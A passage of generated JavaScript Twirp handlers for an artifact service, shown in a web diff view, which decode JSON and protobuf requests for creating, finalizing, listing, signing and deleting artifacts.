return __awaiter(this, void 0, void 0, function* () {
|
|
||||||
let request;
|
|
||||||
let response;
|
|
||||||
try {
|
|
||||||
const body = JSON.parse(data.toString() || "{}");
|
|
||||||
request = artifact_1.GetSignedArtifactURLRequest.fromJson(body, {
|
|
||||||
ignoreUnknownFields: true,
|
|
||||||
});
|
|
||||||
}
|
|
||||||
catch (e) {
|
|
||||||
if (e instanceof Error) {
|
|
||||||
const msg = "the json request could not be decoded";
|
|
||||||
throw new twirp_ts_1.TwirpError(twirp_ts_1.TwirpErrorCode.Malformed, msg).withCause(e, true);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
if (interceptors && interceptors.length > 0) {
|
|
||||||
const interceptor = (0, twirp_ts_1.chainInterceptors)(...interceptors);
|
|
||||||
response = yield interceptor(ctx, request, (ctx, inputReq) => {
|
|
||||||
return service.GetSignedArtifactURL(ctx, inputReq);
|
|
||||||
});
|
|
||||||
}
|
|
||||||
else {
|
|
||||||
response = yield service.GetSignedArtifactURL(ctx, request);
|
|
||||||
}
|
|
||||||
return JSON.stringify(artifact_1.GetSignedArtifactURLResponse.toJson(response, {
|
|
||||||
useProtoFieldName: true,
|
|
||||||
emitDefaultValues: false,
|
|
||||||
}));
|
|
||||||
});
|
|
||||||
}
|
|
||||||
function handleArtifactServiceDeleteArtifactJSON(ctx, service, data, interceptors) {
|
|
||||||
return __awaiter(this, void 0, void 0, function* () {
|
|
||||||
let request;
|
|
||||||
let response;
|
|
||||||
try {
|
|
||||||
const body = JSON.parse(data.toString() || "{}");
|
|
||||||
request = artifact_1.DeleteArtifactRequest.fromJson(body, {
|
|
||||||
ignoreUnknownFields: true,
|
|
||||||
});
|
|
||||||
}
|
|
||||||
catch (e) {
|
|
||||||
if (e instanceof Error) {
|
|
||||||
const msg = "the json request could not be decoded";
|
|
||||||
throw new twirp_ts_1.TwirpError(twirp_ts_1.TwirpErrorCode.Malformed, msg).withCause(e, true);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
if (interceptors && interceptors.length > 0) {
|
|
||||||
const interceptor = (0, twirp_ts_1.chainInterceptors)(...interceptors);
|
|
||||||
response = yield interceptor(ctx, request, (ctx, inputReq) => {
|
|
||||||
return service.DeleteArtifact(ctx, inputReq);
|
|
||||||
});
|
|
||||||
}
|
|
||||||
else {
|
|
||||||
response = yield service.DeleteArtifact(ctx, request);
|
|
||||||
}
|
|
||||||
return JSON.stringify(artifact_1.DeleteArtifactResponse.toJson(response, {
|
|
||||||
useProtoFieldName: true,
|
|
||||||
emitDefaultValues: false,
|
|
||||||
}));
|
|
||||||
});
|
|
||||||
}
|
|
||||||
function handleArtifactServiceCreateArtifactProtobuf(ctx, service, data, interceptors) {
|
|
||||||
return __awaiter(this, void 0, void 0, function* () {
|
|
||||||
let request;
|
|
||||||
let response;
|
|
||||||
try {
|
|
||||||
request = artifact_1.CreateArtifactRequest.fromBinary(data);
|
|
||||||
}
|
|
||||||
catch (e) {
|
|
||||||
if (e instanceof Error) {
|
|
||||||
const msg = "the protobuf request could not be decoded";
|
|
||||||
throw new twirp_ts_1.TwirpError(twirp_ts_1.TwirpErrorCode.Malformed, msg).withCause(e, true);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
if (interceptors && interceptors.length > 0) {
|
|
||||||
const interceptor = (0, twirp_ts_1.chainInterceptors)(...interceptors);
|
|
||||||
response = yield interceptor(ctx, request, (ctx, inputReq) => {
|
|
||||||
return service.CreateArtifact(ctx, inputReq);
|
|
||||||
});
|
|
||||||
}
|
|
||||||
else {
|
|
||||||
response = yield service.CreateArtifact(ctx, request);
|
|
||||||
}
|
|
||||||
return Buffer.from(artifact_1.CreateArtifactResponse.toBinary(response));
|
|
||||||
});
|
|
||||||
}
|
|
||||||
function handleArtifactServiceFinalizeArtifactProtobuf(ctx, service, data, interceptors) {
|
|
||||||
return __awaiter(this, void 0, void 0, function* () {
|
|
||||||
let request;
|
|
||||||
let response;
|
|
||||||
try {
|
|
||||||
request = artifact_1.FinalizeArtifactRequest.fromBinary(data);
|
|
||||||
}
|
|
||||||
catch (e) {
|
|
||||||
if (e instanceof Error) {
|
|
||||||
const msg = "the protobuf request could not be decoded";
|
|
||||||
throw new twirp_ts_1.TwirpError(twirp_ts_1.TwirpErrorCode.Malformed, msg).withCause(e, true);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
if (interceptors && interceptors.length > 0) {
|
|
||||||
const interceptor = (0, twirp_ts_1.chainInterceptors)(...interceptors);
|
|
||||||
response = yield interceptor(ctx, request, (ctx, inputReq) => {
|
|
||||||
return service.FinalizeArtifact(ctx, inputReq);
|
|
||||||
});
|
|
||||||
}
|
|
||||||
else {
|
|
||||||
response = yield service.FinalizeArtifact(ctx, request);
|
|
||||||
}
|
|
||||||
return Buffer.from(artifact_1.FinalizeArtifactResponse.toBinary(response));
|
|
||||||
});
|
|
||||||
}
|
|
||||||
function handleArtifactServiceListArtifactsProtobuf(ctx, service, data, interceptors) {
|
|
||||||
return __awaiter(this, void 0, void 0, function* () {
|
|
||||||
let request;
|
|
||||||
let response;
|
|
||||||
try {
|
|
||||||
request = artifact_1.ListArtifactsRequest.fromBinary(data);
|
|
||||||
}
|
|
||||||
catch (e) {
|
|
||||||
if (e instanceof Error) {
|
|
||||||
const msg = "the protobuf request could not be decoded";
|
|
||||||
throw new twirp_ts_1.TwirpError(twirp_ts_1.TwirpErrorCode.Malformed, msg).withCause(e, true);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
if (interceptors && interceptors.length > 0) {
|
|
||||||
const interceptor = (0, twirp_ts_1.chainInterceptors)(...interceptors);
|
|
||||||
response = yield interceptor(ctx, request, (ctx, inputReq) => {
|
|
||||||
return service.ListArtifacts(ctx, inputReq);
|
|
||||||
});
|
|
||||||
}
|
|
||||||
else {
|
|
||||||
response = yield service.ListArtifacts(ctx, request);
|
|
||||||
}
|
|
||||||
return Buffer.from(artifact_1.ListArtifactsResponse.toBinary(response));
|
|
||||||
});
|
|
||||||
}
|
|
||||||
function handleArtifactServiceGetSignedArtifactURLProtobuf(ctx, service, data, interceptors) {
|
|
||||||
return __awaiter(this, void 0, void 0, function* () {
|
|
||||||
let request;
|
|
||||||
let response;
|
|
||||||
try {
|
|
||||||
request = artifact_1.GetSignedArtifactURLRequest.fromBinary(data);
|
|
||||||
}
|
|
||||||
catch (e) {
|
|
||||||
if (e instanceof Error) {
|
|
||||||
const msg = "the protobuf request could not be decoded";
|
|
||||||
throw new twirp_ts_1.TwirpError(twirp_ts_1.TwirpErrorCode.Malformed, msg).withCause(e, true);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
if (interceptors && interceptors.length > 0) {
|
|
||||||
const interceptor = (0, twirp_ts_1.chainInterceptors)(...interceptors);
|
|
||||||
response = yield interceptor(ctx, request, (ctx, inputReq) => {
|
|
||||||
return service.GetSignedArtifactURL(ctx, inputReq);
|
|
||||||
});
|
|
||||||
}
|
|
||||||
else {
|
|
||||||
response = yield service.GetSignedArtifactURL(ctx, request);
|
|
||||||
}
|
|
||||||
return Buffer.from(artifact_1.GetSignedArtifactURLResponse.toBinary(response));
|
|
||||||
});
|
|
||||||
}
|
|
||||||
function handleArtifactServiceDeleteArtifactProtobuf(ctx, service, data, interceptors) {
|
|
||||||
return __awaiter(this, void 0, void 0, function* () {
|
|
||||||
let request;
|
|
||||||
let response;
|
|
||||||
try {
|
|
||||||
request = artifact_1.DeleteArtifactRequest.fromBinary(data);
|
|
||||||
}
|
|
||||||
catch (e) {
|
|
||||||
if (e instanceof Error) {
|
|
||||||
const msg = "the protobuf request could not be decoded";
|
|
||||||
throw new twirp_ts_1.TwirpError(twirp_ts_1.TwirpErrorCode.Malformed, msg).withCause(e, true);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
if (interceptors && interceptors.length > 0) {
|
|
||||||
const interceptor = (0, twirp_ts_1.chainInterceptors)(...interceptors);
|
|
||||||
response = yield interceptor(ctx, request, (ctx, inputReq) => {
|
|
||||||
return service.DeleteArtifact(ctx, inputReq);
|
|
||||||
});
|
|
||||||
}
|
|
||||||
else {
|
|
||||||
response = yield service.DeleteArtifact(ctx, request);
|
|
||||||
}
|
|
||||||
return Buffer.from(artifact_1.DeleteArtifactResponse.toBinary(response));
|
|
||||||
});
|
|
||||||
}
|
|
||||||
//# sourceMappingURL=artifact.twirp.js.map
|
|
||||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user